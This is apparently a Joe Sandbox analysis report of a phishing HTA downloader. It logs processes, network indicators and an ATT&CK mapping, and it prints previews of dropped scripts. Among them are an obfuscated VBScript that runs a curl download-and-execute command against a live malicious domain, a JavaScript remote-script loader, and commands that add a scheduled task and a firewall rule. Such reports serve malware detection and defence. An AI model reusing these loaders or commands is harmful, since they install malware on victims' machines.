    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeThread delayed: delay time: 1200000
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess information queried: ProcessInformation
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 109.234.39.156 80
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\_6720bdf2272bc\downloaded.zip VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\_6720bdf2272bc\BLOCKBUSTER.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information111
    Scripting
    Valid Accounts1
    Scheduled Task/Job
    1
    Scheduled Task/Job
    111
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote Services1
    Email Collection
    2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job111
    Scripting
    1
    Scheduled Task/Job
    21
    Disable or Modify Tools
    LSASS Memory21
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
    Process Injection
    NTDS1
    File and Directory Discovery
    Distributed Component Object ModelInput Capture14
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets14
    System Information Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    SourceDetectionScannerLabelLink
    C:\_6720bdf2272bc\7zxa.dll4%ReversingLabs
    C:\_6720bdf2272bc\BLOCKBUSTER.exe0%ReversingLabs
    C:\_6720bdf2272bc\unrar.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    acess.mailcffemx.com
    172.67.195.227
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://109.234.39.156/mod-mx282/mx2810.ziptrue
        unknown
        http://109.234.39.156/mx/mx2810.php?nomepc=user-PCtrue
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          172.67.195.227
          acess.mailcffemx.comUnited States
          13335CLOUDFLARENETUStrue
          109.234.39.156
          unknownRussian Federation
          48282VDSINA-ASRUtrue
          IP
          127.0.0.1
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1544419
          Start date and time:2024-10-29 11:56:50 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsinteractivecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:40
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • EGA enabled
          Analysis Mode:stream
          Sample name:#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta
          renamed because original name is a hash value
          Original Sample Name:VER CUENTA_.hta
          Detection:MAL
          Classification:mal96.evad.winHTA@51/13@1/27
          Cookbook Comments:
          • Found application associated with file extension: .hta
          • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta
          Process:C:\Windows\SysWOW64\curl.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):2662
          Entropy (8bit):5.003949152352786
          Encrypted:false
          SSDEEP:
          MD5:316CDF706A8F16492A110E2C547896B4
          SHA1:FDB3CE24E9A8F79514A1EBFFB72DF13AF4DABB32
          SHA-256:6A3BD15FE68808307E5C45B6AF5CDECBABA7AFF1D2E293BE3BE72B79270C3A16
          SHA-512:FDBA3354DDE00353DA9C71ED164E45338B3772C8A8B40BC03380DA5012D4CB1A73CB29982A45F1B77C225856122E90416257A797F07FC85426046938F392E5B5
          Malicious:true
          Reputation:unknown
          Preview:Option Explicit........Sub DownloadAndExtractZip(url, destinationFolder).. Dim xmlhttp, adodbStream, fso, shellApp, files, file, exeFile.. Set fso = CreateObject("Scripting.FileSystemObject").. If Not fso.FolderExists(destinationFolder) Then.. fso.CreateFolder(destinationFolder).. Else.. WScript.Quit.. End If .... Set xmlhttp = CreateObject("MSXML2.XMLHTTP").. Set adodbStream = CreateObject("ADODB.Stream").. .. Set shellApp = CreateObject("Shell.Application").. .. xmlhttp.Open "GET", url, False.. xmlhttp.Send.... adodbStream.Open.. adodbStream.Type = 1 ' Binary.. adodbStream.Write xmlhttp.ResponseBody.. adodbStream.Position = 0 .. adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2 .. adodbStream.Close.... ExtractZipFile destinationFolder & "\downloaded.zip", destinationFolder.... fso.DeleteFile destinationFolder & "\downloaded.zip".... Set files = fso.GetFolder(destinationFolder).Files.. For Ea
          Process:C:\Windows\SysWOW64\mshta.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):721
          Entropy (8bit):5.427407240624717
          Encrypted:false
          SSDEEP:
          MD5:CB50B7DAD4F2572477698101481AE54B
          SHA1:10CC669943247ADFDF3799213542C08F97E6D2DF
          SHA-256:B60F73A7813F96E41FC0B244F1E2322A71CA3B44E1C38109ED28973490D75444
          SHA-512:2A4079F75A43057444FB1A0E40BECB2665FDC0B3A3003FDFC90F43D883E71F82728FC9524CA9B938916B1511CB82C957FA026AC317E1C7B7ED5E82CC27993ECF
          Malicious:true
          Reputation:unknown
          Preview:....function pVvId92(vHkR3pm51) .. pVvId92 = Replace(vHkR3pm51,"|", "")..end function....Dim shell, publicFolder..Set shell = CreateObject("WScript.Shell")..publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")......Dim vbsFilePath..vbsFilePath = publicFolder & "\" & "6720bdf2273b1.vbs"......CreateObject(pVvId92("W|s|c|r|I|p|t.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c curl -k -o " & vbsFilePath & " https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs"), 2, TRUE......CreateObject(pVvId92("|W|s|c|r|I|p|t.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE....CreateObject(pVvId92("|W|s|c|r|I|p|t|.|s|h|E|l|l")).Run pVvId92("cmd /V/D/c start " & vbsFilePath), 2, TRUE..close..close..close
          Process:C:\Windows\SysWOW64\mshta.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):343
          Entropy (8bit):5.443419333788915
          Encrypted:false
          SSDEEP:
          MD5:F67DB8EDE30F7C6C3804E99B89074207
          SHA1:9F2D829E7C0AF6D5BAB55B7B731BCAFAF330CD95
          SHA-256:1453849E4EE5BEF0005A4B31643574970B1DACFDA4D186B6F9D6A2D6CCC48C13
          SHA-512:E9CDC8E47FB95AE7E103A2D1ADE46ADF5071B683014797AEF3D18CB32C88A3DE8B2054D574077632F3D74C78747D1E9D553A3C9CDC53B545CCAE118A9097F5EA
          Malicious:false
          Reputation:unknown
          Preview:moveTo(98559, 91359);..var dqWD0kG9 = document.createElement("script");..var RNGvD95 = ".";..dqWD0kG9.setAttribute("src", "https://acess" + RNGvD95 + "mailcffemx" + RNGvD95 + "com//6720bdf2272bc/6720bdf2273ae" + RNGvD95 + "vbs");..dqWD0kG9.setAttribute("type", "text/vbscript");..document.getElementsByTagName('head')[0].appendChild(dqWD0kG9);
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):6144
          Entropy (8bit):4.11747748014692
          Encrypted:false
          SSDEEP:
          MD5:D7957D46DEFC56F1F24BBDA0D6ADAB8B
          SHA1:AA2DFF927BF23BDF036A81AC7851AFA657E9DEE8
          SHA-256:232CB2AFE6ABA65147C76F1732D5AB37F9F12598BEDA3D21C29F0CD055E34A40
          SHA-512:2FF143C8EC6486AEB59B385F8FEAF7CE98E823F91E4D3059C99DDE14F8A832E39152D2C3F26D1855846458A932B71062A1B0AA882E3C2C31CAC390F3F4DB472F
          Malicious:false
          Reputation:unknown
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):76578816
          Entropy (8bit):5.717349485381296
          Encrypted:false
          SSDEEP:
          MD5:DE4CAC2F1172D2C496B0FC49C8785845
          SHA1:8F1B7C3C92B0921C3E1EECF862435D9ADED2F80B
          SHA-256:8821E371BB1C3A967138EEDC2AB969825FD63D0EB6FEC400EB7BF8334101B3AA
          SHA-512:1976E1A138AEB4BEC8664B23B998C8B844780E47D33DE1ECB9CCC57312B85AE62A4125F29EE54338C015091D780BBFC4B787976D0FC225E0BF88D426A17719E3
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 4%
          Reputation:unknown
          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......g...........!............................@.......................................@.............................................*..........................................................................................................text............................. ..`.itext............................. ..`.data....[.......\..................@....bss.....................................idata............................@....didata.............................@....edata..............................@..@.rdata..E...........................@..@.reloc.............................@..B.rsrc....*.......*...V..............@..@....................................@..@........................................................
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:data
          Category:dropped
          Size (bytes):425472
          Entropy (8bit):7.447705234612919
          Encrypted:false
          SSDEEP:
          MD5:DAC35720BE4D4105234C4C99208C43D9
          SHA1:CA13AEC5182035AC053004D51DDF4EC9A018B494
          SHA-256:DADF7277164AC0D065FEAD44B1ED3E3FD9BCCCA39315AB35DEF952036A0B0B80
          SHA-512:E4FFF267040503457DE828FAFAF73C7A1C095FF87E85BD6CC9D1991193A8A1E51FAEF1DDF9EA5400849A6AABA9793DD9FFA68E032A293ACD134F3274D05AA525
          Malicious:false
          Reputation:unknown
          Preview:.10.L&.M.......G.................a0.L&.I.......................=.a>../^h..9.mn.................U.>S.i.......................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I........................a0.M!.P.............q^..........`0.L&...........................a0.L&.M........?................a0.L&.I........................sd0.m&.I........................3d0(*&.I.........................a0.L&.I.........................a0.L&.I.........................d0.\&.I........................5q.L&......z....................a0.L&S........v...._.......m....a0.L&.I......>.......i....O....a0..#.I..............?.........a0..#.I....N.....................\./&..............I............a0.L&.g........................a0.L&.I...................?....a0.2 .I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.I.........................a0.L&.
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
          Category:dropped
          Size (bytes):9571304
          Entropy (8bit):6.8003113138269855
          Encrypted:false
          SSDEEP:
          MD5:74D3F521A38B23CD25ED61E4F8D99F16
          SHA1:C4CD0E519AECA41E94665F2C5EA60A322DEB3680
          SHA-256:1D822B3FAABB8F65FC30076D32A95757A2C369CCB64AE54572E9F562280AE845
          SHA-512:EC1C8B0EB895FD8947CAD6126ABC5BCA3A712E42475228B9DCB3496098E720ABB83D4CBA4621EDBD8D3AD7F306A5F57CED9C2C98FE2C2D0C8EBBBF99D7FAF0F1
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Reputation:unknown
          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....Z.O..................k...&......)k......0k...@..........................`...................@....................r.O.....r.._....s..F .........`........................................s.......................r.|............................text.....j.......j................. ..`.itext..|{....j..|....j............. ..`.data....&...0k..(....k.............@....bss.........`q......Fq..................idata..._....r..`...Fq.............@....edata..O.....r.......q.............@..@.tls..........r.......q..................rdata........s.......q.............@..@.rsrc....F ...s..H ...q.............@..@....................................@..@................................................................................................
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
          Category:dropped
          Size (bytes):39849410
          Entropy (8bit):7.9749016070421925
          Encrypted:false
          SSDEEP:
          MD5:E499E936F0424B8BC6E2CC98A3958DC4
          SHA1:02433464E2EFBA90F1BF3C993751D45FCFB81FA0
          SHA-256:BEB525FA2B9BFE84A01DC4D2A62624D5481ED7CCD0337764A589BF22F9B39197
          SHA-512:BF548A67C29760F328F49B2B4825541BA63684C3AE17C4A3FD7DA51472EE99B0CA4C461571DBFF2EA60926264D75E8FC5BD2318AE115FD53E8D9FD7336DB70AC
          Malicious:false
          Reputation:unknown
          Preview:PK.........NYY.(x..^..........7zxa.dll.;kl[.u..._.dR...g.]...=%Q].d+....Z.6-^I.(.....!]<4.......VI.LI.$..MC.-..#..@E=....@.A.. ...k...w..}.ER.Z)..H........oD@...l.|.`......c..{?To......[....x1:...g.......e...r..K..RqY..I.Z.Wy.~...<...^...^|dB.....J.....[v..m..3..~|.....1pNVj@........6C.......Tz........;.............}6.......]......E.gT......%..+M=....'..&a....|....Sc...7.<F'...[.:.....,./].a .C..jK...{....#...byqN....+.!...t2..h.g...".`....qE.].E''.c..n..`...Et.[..2F.{>2.x.."y....9.."..8.A.....I9.b...ClEw,...Q%';..eUy.B.%.;..&:'c....N}..<..3..y..D..=8.V.......s...l:.Lb......T.B.<!+..V(.......U.u..I+q..O....O.b..^..2G .u.H:.Z...6!._.z...F(.s...S.s.L.T....r..?.&..Hd..@.2//#.fk.b..9.HM$e..2}..fT....t.3.p:w:)....};:...;+..x:s."...9.....d..T.......V..S..m]..$.2.{5|3..n.9..-&.5.,.PN0z....4..../0..tj.........XP..2wH."~Wz..A.w.q^/..qT.w..s..D...8j..;....lB\.7....TGK"..#....L..k.8.\Km........O......p.V.0./..Q....Gc..wkI..`....k?.r.V&....MB.N...,:.+
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:data
          Category:dropped
          Size (bytes):1561600
          Entropy (8bit):7.330570271317417
          Encrypted:false
          SSDEEP:
          MD5:9E5AA15A31EB279CC89AA4AAB29E5611
          SHA1:8534D576FA9E9B1B5D4CFE697B71D0A87A379381
          SHA-256:D76C62368C4460BA683893ADEA061652900BA9CC923FE30585B8A169F58BAA8A
          SHA-512:2C0FDD5170BA82A47884CEEFA0C83D9CD9D740EB7FB18A7EC3BAEC76C8C6F890E2397DFF65BAF6197E1690E2E8765BB081C6A1D91BCC7F4EA2A34616832A9EA6
          Malicious:false
          Reputation:unknown
          Preview:....V*..........G...............N.S.T*............................S.K..G.Z.1.oo..............:.1.tX`......................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*............................S..+...............q^.....!..NUV.T*..........................J.S.T*..........................N.S.T*..........................N.A.............................NWA.............................N.S.T*..........................N.S.T*...........................zB.T:...<..........................T*...f.......y..............N.S..*.J........................N.S.T*.........?.......Y....O..N.S.TB.................?.........S.T........n..................`.6.;I...............m..........N.S..*........................N.S.T*..........................N.S.T...........................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*..........................N.S.T*..
          Process:C:\Windows\SysWOW64\wscript.exe
          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):178176
          Entropy (8bit):6.475102022731023
          Encrypted:false
          SSDEEP:
          MD5:4289541BE75E95BCFFF04857F7144D87
          SHA1:5EC8085E30D75EC18B8B1E193B3D5AA1648B0D2E
          SHA-256:2631FCDF920610557736549E27939B9C760743A2CDDEC0B2C2254CFA40003FB0
          SHA-512:3137A7790DE74A6413ACA6C80FD57288BCC30A7DF3A416F3C6E8666041CD47A9609136C91405EEE23224C4AE67C9AEBBBA4DD9C4E5786B09B83318755B4A55FD
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          Reputation:unknown
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............C..C..C...C..C...C..C...C...C...C..C.R.C..C..C]..C...C...C...C..C...C..C...C..CRich..C................PE..L.....;J...........!.....4...................P...............................`.......x....@.............................p.......P.... ..4....................0......0R..............................po..@............P...............................text....3.......4.................. ..`.rdata..p;...P...<...8..............@..@.data...|............t..............@....rsrc...4.... ......................@..@.reloc...$...0...&..................@..B................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\netsh.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):7
          Entropy (8bit):2.2359263506290326
          Encrypted:false
          SSDEEP:
          MD5:F1CA165C0DA831C9A17D08C4DECBD114
          SHA1:D750F8260312A40968458169B496C40DACC751CA
          SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
          SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
          Malicious:false
          Reputation:unknown
          Preview:Ok.....
          File type:HTML document, ASCII text, with CRLF line terminators
          Entropy (8bit):4.7967635918575935
          TrID:
          • HyperText Markup Language (12001/1) 66.65%
          • HyperText Markup Language (6006/1) 33.35%
          File name:#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta
          File size:138 bytes
          MD5:1f0b20b8e1b9c0267af0a33368e1d6c7
          SHA1:4c0f0f757d4f84daaa301f8bf96648171eda3cdb
          SHA256:2a1bb69cee435a0cd61bc70387717fce0109108ec1d2e8cf79304a01a602a527
          SHA512:ee08f9b39667e1f22583af01d2e9d75ab72e06e1297f15ce4ca3495b1f6a606c3bb734be0ce9d71fb20aa32165edeeb0bfdfff8531df01149b72af54986c11d2
          SSDEEP:3:qVoB3tObvvUJMyRchDXeNBcHBDXZILGXIMBWhtoAcMBcacWWGb:q43tEvvUJLcVzVpILVMch0MWXfGb
          TLSH:34C09B7B5B404C6C45706F7915A4D3947057758515D1D926C590502367117558F53154
          File Content Preview:<html>..<head>..<script src="https://acess.mailcffemx.com//6720bdf2272bc/js/6720bdf227263.js"></script>..</head>..<body>..</body>..</html>
          Icon Hash:8d8db280a28080a0